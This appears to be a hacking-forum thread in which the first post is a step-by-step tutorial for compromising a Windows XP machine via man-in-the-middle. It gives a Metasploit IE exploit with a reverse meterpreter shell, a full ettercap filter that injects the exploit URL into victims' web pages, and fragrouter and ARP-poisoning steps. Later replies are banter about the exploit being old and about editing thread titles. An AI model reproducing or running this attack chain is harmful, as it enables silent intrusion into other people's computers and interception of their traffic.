Page 1 of 2 12 LastLast
Results 1 to 10 of 21

Thread: Using Mitm attack to gain acces to a box using Fragrouter, Metasploit and Ettercap fi

Hybrid View

  1. #1
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Using Mitm attack to gain acces to a box using Fragrouter, Metasploit and Ettercap fi

    Hey again guys

    Here we go again!! In this tut I will try to explain how I used metasploit to gain access to a windows XP SP2 box using ettercap filters. A reason somebody might use this way to gain access is because there is no interaction with the victim .

    Once again I hold no responsibilities to what people do with this information. DO NOT email me / PM me or post here asking any member of this forum how to use this attack against a real victim!

    Now lets begin

    First lets fire up metasploit, we will use the nice and easy msfweb for this tut. Go to backtrack >> Penetration >> Metasploit framework3 >> msfweb

    Now load up a web browser and go to;

    http://127.0.0.1:55555

    And you should see metasploits web interface. Now do a search in exploits for "internet". Now for this tut I'm going to use the MS03-020 Internet Explorer Object Type exploit. You can use this one or try others. Select the target explorer and now we can choose a payload. And this ones up to you but for EG I will use the windows/meterpreter/reverse_tcp payload. Now lets setup the hack. for SRVHOST input your own IP and the rest is down to what payload you chose. For the example payload set LHOST to your IP too and then hit exploit.

    Next you should get a new screen containing
    Code:
    *Started reverse handler 
    *Using URL: http://192.168.1.64:8080/qp7QmDBnn8q 
    *Server started. 
    *Exploit running as background job.
    *msf exploit(ms03_020_ie_objecttype) >
    Open kwrite and paste the url (in your screen lol not the post) and lets move on....

    Now lets setup our ettercap filter. You can make your own up or use mine below, In my filter I have chose to attach my url to a "img src=" tag. This is because you can guarantee that every web site viewed by the victim is going to contain this tag. You can play with different filters and all dat

    First lets setup a tmp dir to store our crap lol

    Code:
    mkdir metafilter
    cd metafilter
    And now cut and paste my filter to kwrite:

    Code:
    ############################################################################
    #                                                                          #
    #  Metasploit -- metasploit.filter -- filter source file                   #
    #                                                                          #
    #  By DR_Gr33n. based on code from Irongeek                                # 
    #                                                                          #
    #  This program is free software; you can redistribute it and/or modify    #
    #  it under the terms of the GNU General Public License as published by    #
    #  the Free Software Foundation; either version 2 of the License, or       #
    #  (at your option) any later version.                                     #
    #                                                                          #
    ############################################################################
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "paste your url here!!!" ");
       replace("IMG SRC=", "paste your url here!!!" ");
       msg("Check Metasploit.\n");
    }
    Save it as metafilter.filter and close kwrite. Now lets build our filter .......

    Code:
    etterfilter metafilter.filter -o metafilter.ef
    Now we can start our attack.....

    Whopps missed fragrouter ...

    Code:
    fragrouter -B1
    Start ettercap

    Select unified sniffing

    Sniff >> unified sniffing and select your network adaptor

    Now lets scan for our target and go to the host list.

    Hosts >> Scan for hosts
    &
    Hosts >> Host List

    Select your victims ip and hit the add to target button....

    Lets load our filter ...

    Filters >> Load a filter

    Browse through to our folder /root/metafilter and select our filter "metafilter.ef" and OK

    EDIT lol @ purehate yes I know this has been patched a while. Lets not give the whole game away lol think of it as thicko protection.

    Now lets start ARP Poisoning the victim....

    Mitm >> Arp poisoning and tick the "Sniff remote connections" box and OK

    Then Start and Start Sniffing.

    Now watch the bottom screen of ettercap until you see "Check Metasploit". and go back to your metasploit webbrowser.

    You should now have a session started if the hack has worked. If not try another payload or exploit.

    And you are done, pat your self on the back and have fun !!!

    Hope I haven't made any mistakes, if I have give me some abuse lol

    PS: can a moderator edit the title I added dnsspoof balls !

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    I think I see where your going with this but you do know that that actual exploit has been patched for a while. I'll be interested to read the rest. I am currently sitting through a version of camelot where Lou Diamond Phillips is the lead actor and I am excruciatingly bored.

  3. #3
    Member Primey's Avatar
    Join Date
    Sep 2007
    Posts
    126

    Default

    Lou Diamond Phillips is acting again!?

    ewwwww

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by Primey View Post
    Lou Diamond Phillips is acting again!?

    ewwwww
    I scored 23 autographed programs last night and they are getting ready to be on ebay. I canot tell you how much useless rockstar crap Ive sold to fund my computer and pentesting addiction.

    Any way dr.green i assumed you were gonna use the filter in that way. its actually a cool attack but VERY dependent on alot of variables and it is kind of a pain to recompile the filter with every pay load. Ahh well great addition to the board.

  5. #5
    Member elazar's Avatar
    Join Date
    Sep 2007
    Posts
    217

    Default

    Quote Originally Posted by purehate View Post
    I canot tell you how much useless rockstar crap Ive sold to fund my computer and pentesting addiction.
    Amen brother Its incredible what people will buy...
    dd if=/dev/urandom of=/mybrain

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by elazar View Post
    Amen brother Its incredible what people will buy...
    Does that mean you want a programLOL

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by Dr_GrEeN View Post
    PS: can a moderator edit the title I added dnsspoof balls !
    You do have this Phenomenal Cosmic Power. Access it via clicking the "Edit" button then hitting the "Go Advanced" button.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  8. #8
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by Dr_GrEeN View Post
    PS: can a moderator edit the title I added dnsspoof balls !
    Can you give the full title you want it changed to.
    Quote Originally Posted by thorin View Post
    You do have this Phenomenal Cosmic Power. Access it via clicking the "Edit" button then hitting the "Go Advanced" button.
    That will only change the title of the posts within the thread and not the the title of the thread itself.
    You need the "Phenomenal Cosmic Power" of a moderator at least to do that

  9. #9
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by balding_parrot View Post
    That will only change the title of the posts within the thread and not the the title of the thread itself.
    You need the "Phenomenal Cosmic Power" of a moderator at least to do that
    It's his thread, he can edit the title of the first post the way I mentioned.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  10. #10
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by Re@lity View Post
    Of course, this won't help ordinary members, but they can at least request a mod to change a title for them - At the moment I'm not aware of any other way for users to change their own thread titles. I don't think it's something everyone will want to be doing all the time though, so getting a mod to do it for them will probably suffice.
    Here is a partial quote from another thread where we were discussing this very thing.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •